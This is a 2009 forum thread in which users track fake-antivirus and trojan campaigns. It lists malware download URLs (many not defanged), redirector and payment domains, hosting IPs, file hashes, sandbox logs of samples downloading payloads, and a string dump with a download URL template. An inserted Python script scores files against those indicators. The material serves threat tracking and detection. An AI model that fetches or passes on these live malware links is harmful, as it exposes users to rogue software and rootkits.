antimalwareinternetproscanv3.com/1/?id=2004&smersh=bdf6da8d5&back==DQ51TD2NYQMMI=N
antimalwareinternetproscanv3.com/download.php?id=2004
antimalwareinternetproscanv3.com/download/Setup-30a9_02004.exe
anti-malware-internet-scanv3.com/1/?id=2004&smersh=bdf6da8d5&back==DQ51TD2NYQMMI=N
anti-malware-internet-scanv3.com/download/Setup-30a9_02004.exe

AS10929

209.44.126.102
Code: [Select]
area4scan.info/download/install.php
goal4scan.info/download/install.php
intoscan4.info/download/install.php
port4scan.info/download/install.php

209.44.126.104
Code: [Select]
scan4port.info/download/install.php
Code: [Select]
safetyscanguide.com/download.php
safetyscanguide.com/install/ws.exe
securetopshield.com/download.php
securetopshield.com/install/ws.exe
ourbestsecurityshield.com/download.php
ourbestsecurityshield.com/install/ws.exe
wifisecurityscan.com/download.php
wifisecurityscan.com/install/ws.exe

Wepawet (http://wepawet.iseclab.org/view.php?hash=921517e2aa4b6f2affeb92a5ae0bddb1&t=1244702322&type=js)
VirusTotal (http://www.virustotal.com/analisis/cd43e17d4ed7bac08407430842310c3e7df348de3733ff8a403b02e4f3e8a77a-1244702427)
Anubis (http://anubis.iseclab.org/?action=result&task_id=10ff8a6c84f9c5624fd33c0e91ffe6f1c)

ns for malware domain

ns1.ahuliard.com
ns2.ahuliard.com
ns1.godsecurityarchive.com
ns2.godsecurityarchive.com

38.105.19.27
Code: [Select]
scan6tool.info/download/install.php
scan6true.info/download/install.php
scantool6.info/download/install.php
scantrue6.info/download/install.php
tool6scan.info/download/install.php
toolscan6.info/download/install.php
true6scan.info/download/install.php
truescan6.info/download/install.php

84.16.234.27
Code: [Select]
adiosma.cn/installer_1.exe
gefvoqi.cn/installer_1.exe
gethufi.cn/installer_1.exe
gewolu.cn/installer_1.exe
gisahu.cn/installer_1.exe
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 11, 2009, 10:50:12 am
redirects to hi-my-tube[.]com then exe-file-boom[.]com

205.177.124.46
Code: [Select]
hxxp://antonella.tv/AntonellasVideo.avi
hxxp://jennavideos.org/JennaJamesonVideo18.avi
hxxp://katiereesphotos.org/KatieReesVideo1.avi
Wepawet (http://wepawet.iseclab.org/view.php?hash=743465e2f094dee797af771fac9ca1ed&t=1244716943&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=3d37508af0bf2867008a2c45db4b9753&t=1244717002&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=402177dbfa0886a28a68d27983bc978b&t=1244717178&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 11, 2009, 11:37:48 am
AS21788 (NOC) - 64.191.92.197 [64-191-92-197.hostnoc.net]

Rogue aka "MS AntiSpyware 2009" (CrucialSoft Ltd):

(http://www.threatexpert.com/getimage.aspx?uid=6e07e6ea-6afd-4e28-b673-2d629ee7d15d&image=screen&sub=1)

ThreatExpert (http://www.threatexpert.com/report.aspx?md5=2fb1ec492f7f919598bc18cc0ea2b7f2)

Quote
Sections ( UPX0 UPX1 .rsrc  )
File:   MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit, UPX compressed
   Strings:.php?,T
   Strings:<assemblyIdentity type="win32" name="KOL" version="1.0.0.0" processorArchitecture="*"/>
   Strings:<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" publicKeyToken="6595b64144ccf1df" language="*" processorArchitecture="*"/>
   Strings:UNPACKED .exe
   Strings:UNPACKED hxxp://dl.%s/get/?pin=%s&lnd=%s
   Strings:UNPACKED hxxp://int.
   Strings:UNPACKED <PROGRAMFILES>\sniffem\sniffem.exe
   Strings:UNPACKED <PROGRAMFILES>\Effetech http sniffer\ehsniffer.exe
   Strings:UNPACKED <PROGRAMFILES>\GJPsoft\ultranetsniffer\netpryer.exe
   Strings:UNPACKED Software\Microsoft\Windows\CurrentVersion\Run
   Strings:UNPACKED Software\Microsoft\Windows\CurrentVersion\Drivers\Video\Options\
   Strings:UNPACKED _addon.exe
   Strings:UNPACKED regsvr32.exe
   Strings:UNPACKED stat.php?
Size:   60416 bytes,
MD5:   2fb1ec492f7f919598bc18cc0ea2b7f2

VirusTotal (http://www.virustotal.com/analisis/8cf3e57e16338249395b966fab146f8d40fab54c1b6e034690ec7a363822023d-1244326002) - 31/38 (81.58%)

Code: [Select]
hxxp://1-againstspy.net/setup_1.exe
hxxp://1-antispystore.com/setup_1.exe
hxxp://1-antspy2008.com/setup_1.exe
hxxp://2-againstspy.net/setup_1.exe
hxxp://2-agentprotect.net/setup_1.exe
hxxp://againstspy.net/setup_1.exe
hxxp://agentprotect.net/setup_1.exe
hxxp://antspy2008.com/setup_1.exe
hxxp://mas2009.com/setup_1.exe
hxxp://myspyguard.com/setup_1.exe
hxxp://webspyguard.com/setup_1.exe

other domain on this IP:

Rogue InternetAntivirusPro
Code: [Select]
hxxp://1-webspyguard.com/download/InternetAntivirusPro.exe
hxxp://1-mas2009.com/download/InternetAntivirusPro.exe
hxxp://1-agentprotect.net/download/InternetAntivirusPro.exe
hxxp://antispystore.com/download/InternetAntivirusPro.exe
hxxp://myantispy.net/download/InternetAntivirusPro.exe

File size: 2029930 bytes
MD5: 52f740f4dd5af2a7bfcfb91cc3e690a1

VirusTotal (http://www.virustotal.com/analisis/875b289a2af80167a2574a49ff09eb60c03d468a1a02901b378037946f52a5ab-1244686741) - 15/39 (38.46%)

Rogue Privacy Center (Privacy Tools Pack):
Code: [Select]
hxxp://spguard2008.com/install.exe

File size: 2203364 bytes
MD5: e08b9468c5985f2c26d81855992e4d4e

VirusTotal (http://www.virustotal.com/analisis/081c945cbe4cdfe501f246d6051a3acb8095d5407b99d6bcb290e3db4e815b61-1243222605) - 24/39 (61.54%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=f84f8de93f7584341c9c736f2f1e94ec&t=1244687085&type=js)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=e08b9468c5985f2c26d81855992e4d4e)

Rogue Antivirus360:
Code: [Select]
hxxp://removevirusonline.com/index.php?g=download
hxxp://removevirusonline.com/av_360.exe

File size: 2093056 bytes
MD5: 3dae34ea276abbc5e3364627458a4111

VirusTotal (http://www.virustotal.com/analisis/8db1593b6dfef9eee31d463f6cbf86806a584e423e690094b3e5131676dcc531-1239612056) - 25/39 (64.10%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=d134f1d5c442b0a726b28e7431a4ff35&t=1244690838&type=js)

Rogue General Antivirus:
Code: [Select]
hxxp://1-myantispy.net
hxxp://1-myspyguard.com
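The ThreatExpert string dump quoted in the post above is the kind of indicator set a first-pass static triage keys on: the three HTTP-sniffer install paths the sample looks for (anti-analysis), the CurrentVersion\Run key (persistence), the dl.%s/get/?pin=%s&lnd=%s format string (download/C2 URL built at runtime) and the UPX0/UPX1 section names (packed). The Python below is an added example, not code from the post, from ThreatExpert or from the sample: it pulls printable strings out of a byte blob the way `strings -n 6` would and scores the blob against exactly those indicators. The two sample blobs, the six-byte minimum, the three-of-four threshold and the verdict labels are my assumptions.

```python
"""Static string triage against the indicators quoted from the ThreatExpert report (added example)."""
import re

# Anti-analysis checks from the string dump: the rogue probes for HTTP sniffers.
SNIFFER_BINARIES = (
    b"sniffem\\sniffem.exe",
    b"Effetech http sniffer\\ehsniffer.exe",
    b"GJPsoft\\ultranetsniffer\\netpryer.exe",
)
# Persistence location from the dump.
RUN_KEY = b"Software\\Microsoft\\Windows\\CurrentVersion\\Run"
# Download/C2 URL template; the %s placeholders are filled in at runtime.
C2_TEMPLATE = re.compile(rb"https?://dl\.%s/get/\?pin=%s&lnd=%s")
# UPX section names as listed under "Sections" in the report.
UPX_SECTIONS = (b"UPX0", b"UPX1")

# Printable ASCII runs of at least 6 bytes (assumed minimum, same default as `strings`).
PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")


def extract_strings(data: bytes) -> list:
    """Return the printable ASCII runs in `data`, in file order."""
    return [m.group(0) for m in PRINTABLE.finditer(data)]


def triage(data: bytes) -> dict:
    """Score a binary blob against the four indicator families from the string dump."""
    blob = b"\n".join(extract_strings(data))
    hits = {
        # Section names are shorter than 6 bytes, so check the raw data, not the string list.
        "upx_packed": all(name in data for name in UPX_SECTIONS),
        "sniffer_checks": [p.decode() for p in SNIFFER_BINARIES if p in blob],
        "run_key_persistence": RUN_KEY in blob,
        "c2_url_template": C2_TEMPLATE.search(blob) is not None,
    }
    # One point per indicator family; three of four is the (assumed) reporting threshold.
    score = (int(hits["upx_packed"]) + int(bool(hits["sniffer_checks"]))
             + int(hits["run_key_persistence"]) + int(hits["c2_url_template"]))
    hits["score"] = score
    hits["verdict"] = "rogue-like" if score >= 3 else "inconclusive"
    return hits


# Constructed sample: strings from the quoted report, NUL-separated as they would sit in a PE.
SAMPLE_ROGUE = b"\x00".join([
    b"MZ", b"UPX0", b"UPX1", b".rsrc",
    b"<PROGRAMFILES>\\sniffem\\sniffem.exe",
    b"<PROGRAMFILES>\\Effetech http sniffer\\ehsniffer.exe",
    b"<PROGRAMFILES>\\GJPsoft\\ultranetsniffer\\netpryer.exe",
    b"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    b"http://dl.%s/get/?pin=%s&lnd=%s",
    b"regsvr32.exe", b"stat.php?",
])

# Constructed control blob with ordinary PE strings and none of the indicators.
SAMPLE_BENIGN = b"\x00".join([
    b"MZ", b".text", b".rdata", b"This program cannot be run in DOS mode.",
    b"KERNEL32.dll", b"GetProcAddress",
])

if __name__ == "__main__":
    for label, sample in (("rogue sample", SAMPLE_ROGUE), ("control", SAMPLE_BENIGN)):
        print(label, triage(sample))
```

Run it against a real file by reading the bytes and passing them to `triage()`; the sniffer-path check in particular is a behaviour a packer does not hide, since the strings have to be in the clear at runtime for the comparison to work.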
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 12, 2009, 09:58:42 pm
209.44.126.241 - malware call (redirects)
Code: [Select]
hortshieldpc.com/in.php
intellectsecfind.com/in.php
thefirstupper.com/in.php

209.44.126.102 - Fake AV
Code: [Select]
areascan4.info/download/install.php
finescan4.info/download/install.php
goalscan4.info/download/install.php
hardscan4.info/download/install.php
onescan4.info/download/install.php
page4scan.info/download/install.php
pagescan4.info/download/install.php
portscan4.info/download/install.php
scan4into.info/download/install.php
modescan4.info/download/install.php

64.20.38.171 - Trojan
Code: [Select]
go-exe-go.com/crack.45000.exe
go-exe-go.com/softwarefortubeview.40009.exe
super-exe-home.com/Keygen&Crack.45000.exe
super-exe-home.com/softwarefortubeview.40009.exe
gruzzilla.com/Keygen&Crack.45000.exe
gruzzilla.com/softwarefortubeview.40009.exe
VirusTotal (http://www.virustotal.com/analisis/d8a1d5cc0267485e66b06f2c2837a670dc2ae41c3916c01552e30d1c4509887b-1244828381): 9/39 (23.08%)
VirusTotal (http://www.virustotal.com/analisis/fd44f193dbd554153788a015de16c819a6ca1f91bc8c8ded3c09451f7652fc55-1244828553): 11/39 (28.21%)

213.163.64.81 - Trojan DNSChanger
Code: [Select]
mofmeta.com/download/61676f5647513d3db9a455cb20090602/flash.exe
Wepawet (http://wepawet.iseclab.org/view.php?hash=cbfb26fdf49606d206a0f75f0fe44b61&t=1244828191&type=js)
VirusTotal (http://www.virustotal.com/analisis/7377a605b62abae85f8ca79dd73f50733b152e5ebdf36565b74e37d8a6bf083b-1244828277) - 12/40 (30.00%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1530ab7d5b2bac7b441d69d5471931cf4)
Quote
Connection to 213.163.64.81:80 - [213.163.64.81]
Request: POST /cgi-bin/generator
Response: 200 "OK"

74.52.88.195 - Redirects to rogue:
Code: [Select]
directtechhosting.com/in.cgi?6
directtechweb.com/in.cgi?6
directtechweb.net/in.cgi?6

64.86.17.47 - Redirects to rogue (successor of av-guard.net)
Code: [Select]
av4best.net/?uid=106&pid=3
Wepawet (http://wepawet.iseclab.org/view.php?hash=3c5ac5252cd6d16846411dcf90ef4317&t=1244830477&type=js)

91.212.65.125, 69.4.230.204, 83.133.115.9, 92.62.98.19 - Rogue AV:
Code: [Select]
fastpcscan3.com/1/?id=2022&smersh=973084e1d&back=%3DTQ52DD3NgQOMI%3DN
fastpcscan3.com/download.php?id=2022
fastpcscan3.com/download/Setup-398_02022.exe
Wepawet (http://wepawet.iseclab.org/view.php?hash=3d2c3327b78a9b2cbac79bdb862bcd8c&t=1244789036&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=60f8f56a3a9fb88cb38e391c1d19934a&t=1244789156&type=js)
VirusTotal (http://www.virustotal.com/analisis/66b2e6d246af96022c7e2728cbfa04ff8f5b721ab5ee641848c1d1fdaa20f001-1244789354) - 2/40 (5.00%)

Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 12, 2009, 10:04:51 pm
88.198.41.170 - fake av
Code: [Select]
powerantivirusscannerv2.com/1/?id=2018&smersh=ee0592373&back==TQx2zD4NIQNMI=N
powerantivirusscannerv2.com/download.php?id=2018
powerantivirusscannerv2.com/download/Setup-a5320fa_02018.exe
Wepawet (http://wepawet.iseclab.org/view.php?hash=a70f99ed81b7f7b6931d2e090077f4ac&t=1244828513&type=js)

64.191.102.135 - directs to trojan
Code: [Select]
super-antiviral-scan.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=dcb29c6849abd12215232e04fe98a026&t=1244768624&type=js)

92.62.98.19 - rogue av
Code: [Select]
bestantiviruscheck2.com/1/?id=2013&smersh=bdf6da8d5&back==TQ02DD3NEQMMI=N
bestantiviruscheck2.com/download.php?id=2013
bestantiviruscheck2.com/download/Setup-8d5d21_02013.exe

217.112.94.230 - rogue av
Code: [Select]
downloadsoftwareserver3.com/xpdeluxe.exe
downloadsoftwareserver3.com/iehostcx32.dll

83.133.123.140 - redirects to rogue
Code: [Select]
goldeninternetsites.com/go.php?id=2013&key=a98402e2d&p=1
Wepawet (http://wepawet.iseclab.org/view.php?hash=6054f66bdd60fac6b1b823e449b565fb&t=1244710514&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 16, 2009, 12:53:15 am
209.44.126.22 - Fake AV
Code: [Select]
netsecurityworks.com/download.php

209.44.126.36 - Fake AV
Code: [Select]
stabilitytools.com/download.php

209.44.126.102 - Redirects to Fake AV
Code: [Select]
gorichscan.com
goscanrich.com
goscansoon.com

209.44.126.102 - Fake AV
Code: [Select]
planscan4.info/download/install.php
fullscan4.info/download/install.php
scan4page.info/download/install.php
scanfix4.info/download/install.php

209.44.126.241 - Fake AV
Code: [Select]
scantrustsecurity.com/download.php
gisecurityshield.com/download.php

*****

195.95.151.174 - Fake AV downloader
Code: [Select]
gojaxty.cn/installer_1.exe
fexonhu.cn/installer_1.exe
gihugyx.cn/installer_1.exe
giwgeam.cn/installer_1.exe
VirusTotal (http://www.virustotal.com/analisis/6d59311aaf1ae0ad1462b26ec3c5f5f2027e7ae890aae5a79ca0a1f6fd2a6c0d-1245103256) - 6/23 (26.09%)

then

195.95.151.174 - Fake AV
Code: [Select]
megaantivirusplus.com/redirect.php
megaantivirusplus.com/se.exe
megaantivirusplus.com/setup.exe
megaantivirusplus.com/cb/real.php?id=1
megaantivirusplus.com/cb/installs.php?id=1
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=895c832c623d20063a782ea6180356ef)

******

84.16.235.187 - Fake AV
Code: [Select]
gen6scan.info/download/install.php
scannote6.info/download/install.php

204.27.57.227 - Fake AV
Code: [Select]
scan4note.info/download/install.php
top4scan.info/download/install.php

*******

Fake codec
Code: [Select]
my-xxl-tube.com/xplay.php
tube-collection.com/xplay.php
tube-storages.com/xplay.php
tubes-portal.com/xplay.ph

then trojan

Code: [Select]
hot-exe-area.com/streamviewer.40000.exe
hot-exe-area.com/softwarefortubeview.40009.exe
exe-2009-ok.com/TubeViewer.ver.6.40000.exe
exe-2009-ok.com/softwarefortubeview.40009.exe
main-exe-home.com/TubeViewer.ver.6.40000.exe
main-exe-home.com/softwarefortubeview.40009.exe
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 28, 2009, 05:57:46 pm
Rogue AV

38.105.19.27
Code: [Select]
scan6user.info/download/install.php
scanuser6.info/download/install.php
scan6way.info/download/install.php
scanway6.info/download/install.php
way6scan.info/download/install.php
wayscan6.info/download/install.php
luxscan6.info/download/install.php
scan6fix.info/download/install.php
scan6note.info/download/install.php
genscan6.info/download/install.php
atomscan6.info/download/install.php
user6scan.info/download/install.php
ina6co.com/cki.php?uid=keyin
ina6sk.com/reports/download-report.php?prod_id=9
ina6sk.com/download/file.exe
ina6sk.com/download/InternetAntivirusPro.exe
goscaniron.com
goscanslim.com
goslimscan.com

209.44.126.x
Code: [Select]
securitywidgets.com
thesecuritytools.com

***

redirects to rogue

Code: [Select]
bestinternetoverview.com/go.php?id=2022&key=4c69e59ac&p=1
birthdaypostcard.cn/go.php?id=2022&key=4c69e59ac&p=1
lastfmmusic.cn/go.php?id=2004&key=ff0057594&p=1
quakeworldlive.cn/go.php?id=2022&key=4c69e59ac&p=1
apoiweh.cn/x_private_backtraffnail.php/?uid=102
22may2009.com/xr/in.php?r=default&s=morning&ss=c55aab543facee40ba25&seref=&ref=http://michael-jackson-s-son-
goto-my.com/t.php?s=morning&ss=c55aab543facee40ba25
blanket.bitelere.us

redirects using d87*eu/2.js

Code: [Select]
a2porn.us
a3porn.us
a4porn.us
a5porn.us
a6porn.us
a7porn.us
celebyama.com
moocelebs.com
ralfscelebs.com
yoocelebs.com
daniel-ratcliffe-nude.a2r.us
naked-girl-pool.a2g.us
i-wuhrer-sex-scene.a2h.us
vintage-porn-movies.a2v.us
teen-swimsuit-lingerie-models.a2x.us
nude-amateur-clips.a2y.us
sex-free-gallery.a2r.us
lf-hunter-videos.a5b.us
milf-hunter-videos.a5b.us
no-creditcard-porn.a2r.us
michael-jackson-and-brooke-shields.a2h.us
janet-jackson-all-for-you.a2g.us
andrea-jackson-nude.a2p.us
janet-jackson-tonights-the-night.a2h.us
fkk-mature-foto.a2v.us
janet-jackson-discipline.a2c.us
www-nude-young.a2q.us
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 28, 2009, 08:07:56 pm
Rogue AV:

Code: [Select]
hxxp://best-protect.info/install.php
hxxp://download.best-protect.info/dl/PreInstaller.exe

VirusTotal (http://www.virustotal.com/analisis/fa77ed85c5f3c14c8ca805b376eac93e2ce9f9b7201bc3de273929a5d0d3dbc3-1246204835) - 6/41 (14.63%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=8f72c900744c9b454ef7030408e23c86&t=1246217307&type=js)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1e85f0d74aeb04b9411414517a637623f)

Quote
From ANUBIS:1032 to 70.38.11.165:80 - [70.38.11.165] 
Request: GET /admin/cgi-bin/get_domain.php?type=download 
Response: 200 "OK" 
Request: GET /admin/cgi-bin/get_domain.php?type=download 
Response: 200 "OK" 
Request: GET /admin/cgi-bin/get_domain.php?type=download 
Response: 200 "OK" 
Quote
From ANUBIS:1033 to 174.142.113.205:80 - [download.best-protect.info] 
Request: GET /collection.php?step=InstallBegin&id=none 
Response: 404 "<empty>" 
Request: GET /dl/Installer.exe 
Response: 200 "OK" 
Request: GET /dl/ABEST.CAB 
Response: 200 "OK" 
Request: GET /dl/QWProtect.dll 
Response: 200 "OK" 
Request: GET /dl/BS.exe 
Response: 200 "OK"

Code: [Select]
hxxp://7security.info/?uid=102&pid=3
hxxp://7security.info/?cmd=executeRedirect&p=rVaunZxWcmqRX5CIoZmRVmxrkE%2FDkpLYT52GqXKKhne7g49bm6RbblpsaWeTYZWUZmBbZWRxhlmEnKOIZ5mQhaCqVHCH2NmOoH%2Bno6%2BiWmWDj83KU2pPlpGN0pjQn6fUT4%2BG1qWYpqvYg52tpKmeYFqpqqWDZ4bOpaSdbo5nwFzDoJ%2FPpMjMkZSljmXdwNOrm6qaqJ2TmprEmNjYkpaTopOh0FvSmKCIqg%3D%3D
hxxp://7security.info/?p=WKmimHVlaGuHjsbIo21zdYWMpYOInKOjY4nT1m6uqIvTrNGoqaJflqGYdZvAgtLRn5%2Bkog%3D%3D

hxxp://protectionurl.info/?uid=102&pid=3
hxxp://protectionurl.info/?cmd=executeRedirect&p=rVaunZxWcmqRX5CIoZmRVmxrkE%2FDkpLYT52GqXKKhne7g49bm6RbblpsaWeTYZWUZmBbZWRxhlmEnKOIZ5mQhaCqVHCH2NmOoH%2Bno6%2BiWmWDj83KU2pPlpGN0pjQn6fUT4%2BG1qWYpqvYg52tpKmeYFqpqqWDZ4bOpaSdbo5nwFzDoJ%2FPpMjMkZSljmXdwNOrm6qaqJ2TmprEmNjYkpaTopOh0FvSmKCIqg%3D%3D
hxxp://protectionurl.info/?p=WKmimHVlaGuHjsbIo21zdYWMpYOInKOjY4nT1m6uqIvTrNGoqaJflqGYdZvAgtLRn5%2Bkog%3D%3D
hxxp://protectionurl.info/build8_102.php?cmd=getFile&counter=1&p=WKmimHVlaGuHjsbIo21zdYWMpYOInKOjZYnT1m6uqIzO1NeaWJaimHWWl4KmZQ==

hxxp://myofficeguard.info/?p=WKmimHVlaGuHjsbIo21zdYWMpYOInKOjZInT1m6uqI61h8WilnGbk4F5bw==

Anubis (http://anubis.iseclab.org/?action=result&task_id=1596a8b734a38faa4197bd74022b7a3ac)

Quote
From ANUBIS:1033 to 64.86.17.9:80 - [updvmfnow.cn] 
Request: POST /reports/minstalls.php 
Response: 200 "OK" 
Request: POST /reports/minstalls.php 
Response: 200 "OK" 
Quote
From ANUBIS:1035 to 206.53.61.73:80 - [update1.fastantivirus09.com] 
Request: HEAD /ReleaseXP.exe 
Response: 200 "OK" 
Request: GET /ReleaseXP.exe 
Response: 200 "OK" 

Payment page for rogue av:
Code: [Select]
hxxp://restricteddomainhelp.com/1/
==>
hxxp://msncoreupdate.com/buy.php?
==>
hxxp://secure.onlineantivirusmarket.com/buy.php?

Wepawet (http://wepawet.iseclab.org/view.php?hash=c5e108624d44e8c30a9ca4e88c80036e&t=1246076039&type=js)

Code: [Select]
hxxp://restricteddomainhelp.com/1/
==>
hxxp://msncoreupdate.com/buy.php
==>
hxxps://secure.privatesecuredpayments.com/billpav/?
Title: Re: Rogue - Fake AV -
Post by: Netelligent1 on July 23, 2009, 10:38:16 pm
I think the following YouTube video is proof of how unprofessional these folks at Netelligent Hosting Services Inc. are. If I was hosting a bunch of viruses, I would want it stopped.

See a phone call about this to them and how they don't give a crap.

Check out the Google map: they run the datacenter out of a home?!?! Or is it a fake address?

http://www.youtube.com/watch?v=TuXxDYNrOe0

Title: Re: Rogue - Fake AV
Post by: MysteryFCM on July 24, 2009, 12:41:12 am
The download for the site referenced on the YouTube page is:

namearra.info/download/install.php

Which downloads a file called install.exe, which is a fake AV and apparently, as a bonus, also gives you the TDSS rootkit:

http://www.virustotal.com/analisis/7a924c9b8ee6d669dcb319ea5b91b15b926ad0f7ac03e3099c15f5dbae765e2e-1248394178
Title: Re: Rogue - Fake AV
Post by: ocean on July 29, 2009, 09:40:18 am
Code: [Select]
http://nomalwares.com/
which redirects to the setup of the known
Code: [Select]
http://www.malwarebot.com/
through clickbank.net

http://www.virustotal.com/analisis/b7fb223df6da629ba93fd95897a496794be63216ce9f53107e1714d9c980bbc9-1248860632
Title: Re: Rogue - Fake AV
Post by: CkreM on July 30, 2009, 07:10:33 am
Fake AV:
Code: [Select]
wertabulionsedaf.com/2/installer/Installer.exe?u=1025&s=e8f4f9a25ccda16144f11cd34e2528ff&t=2
retulahertomanof.com/2/installer/Installer.exe?u=1025&s=e8f4f9a25ccda16144f11cd34e2528ff&t=2
http://www.virustotal.com/analisis/93118ae2bb741aac13c9f4e74452ad33811a05c4b3adfaebf17bacc3f3bd0a92-1248937352
Code: [Select]
home-anti-virus2010.com
Homeantivirus2010.com
Homeav2010.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on August 17, 2009, 12:43:55 am
78.46.201.89 (redirectors to fake av aka personal antivirus)

Code: [Select]
b2b-forums.cn
bestvanillaresorts.cn
consensualart.cn
goldensunshine.cn
guidetogalaxy.cn
mywatermakrs.cn
personalrespect.cn
snowboard2009.cn
vipsoccermanager.cn

payload: /go.php?id=2013-01&key=a98402e2d&p=1

195.95.151.174 and 91.213.29.250

payload :

/installer_1.exe
/install.exe
/test.exe

or whatever you want with .exe

Code: [Select]
aguraot.cn
ajokauz.cn
ajuadeb.cn
ajufeiv.cn
ajyawif.cn
akeraoq.cn
akipahu.cn
akoede.cn
akoetly.cn
ameapi.cn
ameojyl.cn
amoujag.cn
anamuco.cn
aniuha.cn
aniulu.cn
anoemyx.cn
apefovy.cn
ateudny.cn
ateugic.cn
ateygi.cn
ateylqo.cn
atiawy.cn
atiguko.cn
ativoma.cn
atoacu.cn
atoceuk.cn
atofaf.cn
atuican.cn
atuyfe.cn
atuypha.cn
atyorzi.cn
atyrefi.cn
avayhik.cn
avemyk.cn
aveyco.cn
aveylpa.cn
avinyk.cn
aviopuh.cn
avoapyt.cn
avoeksi.cn
avoilem.cn
avomec.cn
avotyab.cn
avyatoh.cn
avyciso.cn
avyewi.cn
avygip.cn
avyodu.cn
avyofzu.cn
avyxaze.cn
awakuvi.cn
awaokfy.cn
awapero.cn
awaviyh.cn
awetudo.cn
awixys.cn
awoenpa.cn
awohebu.cn
awointa.cn
awozyt.cn
awukoga.cn
awumeha.cn
awuofo.cn
awupayk.cn
awyiqy.cn
awykep.cn
axaloeq.cn
axaobe.cn
axaonyc.cn
axecaif.cn
axeonar.cn
axeubi.cn
axeziry.cn
axezuko.cn
axiufow.cn
axiyqje.cn
axobaeg.cn
axoejaw.cn
axominy.cn
axucame.cn
axuewpo.cn
axuiwi.cn
axuovaf.cn
axygaek.cn
axykoqi.cn
axyqoz.cn
azacior.cn
azaedo.cn
azaujyr.cn
azeifko.cn
azejyri.cn
aziduon.cn
aziwote.cn
aziybga.cn
azoeldy.cn
azoexyh.cn
azokicu.cn
azovuqe.cn
azulydo.cn
azuones.cn
azuwem.cn
azysof.cn
babomvy.cn
bagsuni.cn
bagucqy.cn
bajnouq.cn
bajtoun.cn
bakyfxi.cn
banpyz.cn
bansexy.cn
bapebtu.cn
baqcemy.cn
baswoju.cn
bavwyto.cn
bazyrpe.cn
bebqac.cn
bedacqo.cn
bedgyg.cn
bedkosi.cn
bedtuif.cn
befpygi.cn
beguqiw.cn
behiswa.cn
beqgivo.cn
bestyru.cn
betimi.cn
betsuq.cn
bevafzi.cn
bewugox.cn
bexazyj.cn
bicqoej.cn
bikodny.cn
biqusu.cn
birzuof.cn
bisqop.cn
bisquva.cn
bizagy.cn
bizeda.cn
bobqaul.cn
bobujgi.cn
bocisak.cn
bocvur.cn
boknegi.cn
bokpaej.cn
bomkyvi.cn
borive.cn
boszacy.cn
boxmic.cn
bozipe.cn
boziqdu.cn
bozkus.cn
bozradi.cn
bubita.cn
dadquox.cn
dahure.cn
dajugif.cn
dakyqop.cn
ezeunac.cn
ezoagu.cn
ezuxevo.cn
fidteur.cn
fifteko.cn
fifxuer.cn
fimcuoj.cn
finwuyc.cn
fisruba.cn
fixguat.cn
fobrim.cn
focunqa.cn
fogpak.cn
fomazej.cn
fombual.cn
foszecy.cn
fotkum.cn
gopawu.cn
gopiby.cn
goqfap.cn
gortuwe.cn
gotceyr.cn
gotuqjy.cn
govaqip.cn
gowyti.cn
goxweyc.cn
gubcyil.cn
gubywef.cn
gugema.cn
gugkyaf.cn
gujdywa.cn
gurqyak.cn
gutciko.cn
guxryac.cn
gybukop.cn
gybwuv.cn
hagnuor.cn
haronpi.cn
idyise.cn
idyzok.cn
zypudo.cn
zyrnuhe.cn
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on August 17, 2009, 01:16:32 am
rogue fraudtool:
Code: [Select]
unvirex.com/UnVirexInstall.exe
199.238.181.158/setup.exe
199.238.181.161/setup.exe
intelinet-global.com/setup.exe
intelinet-global.net/setup.exe
intelinet-secure1.com/setup.exe
intelinet-secured.com/setup.exe
intelinet-dll-repair.com/setup.exe

systemsecurity:
Code: [Select]
serversafety.com/download.php
cybernetsafety.com/download.php
cheapsecurityscan.com/download.php
cheapsecurityscan.com/install/ws.exe
bestscannerever.com/download.php
bestscannerever.com/install/ws.exe
gersoft.info/download.php
gersoft.info/install/ws.exe

other rogue:
Code: [Select]
antiviruspro-live.com/Setup.exe

AdvancedVirusRemover:
Code: [Select]
bestscanpc.org/cgi-bin/load.pl

internetantiviruspro:
Code: [Select]
inb4it.com/download/file.exe
inb4it.com/download/InternetAntivirusPro.exe

smartprotectorpro:
Code: [Select]
195.95.151.184/smrtprt/setup.php?track_id=10001

fakespypro:
Code: [Select]
210.51.187.45/lib/update.exe

trojan fakerean:

payload:

/1/installer/Installer.exe
/2/installer/Installer.exe
/3/installer/Installer.exe
Code: [Select]
1024service.com
absolute-sports.com
amerikosamoder.com
berdanovskalonas.com
berhutervalonio.com
bugermanosatora.com
buteratorader.com
byhelp.com
car-motor.net
dealivery.com
educationdegreeonline.net
ertonagionalos.com
filewongatorda.com
golinovatorew.com
guletrmonahertuli.com
guletrubanionader.com
kiluretynefads.com
lilusanotraserta.com
millenyi.com
molinasdeals.com
mulikostarokaser.com
numbergatoriosso.com
odogdisconts.com
pcprogredukt.com
pcredirbugelda.com
pcredirlimasolat.com
pcredirokat.com
pcredirtumbasot.com
pcsecnitrosat.com
polakestrovanios.com
polserdagoniosa.com
queerdiscdeals.com
qwedasertafoas.com
reddogdiscounts.com
redipolkanosata.com
redirosanokas.com
redopalikosafer.com
redugaferdatona.com
redusecovulia.com
reeni.net
refadertogamo.com
sammyboydeals.com
sloon.net
starmak.net
uilerdobavonader.com
uiterbunagoretas.com
urgettindeals.com
vulertunerilos.com
vulesdaboknoerba.com
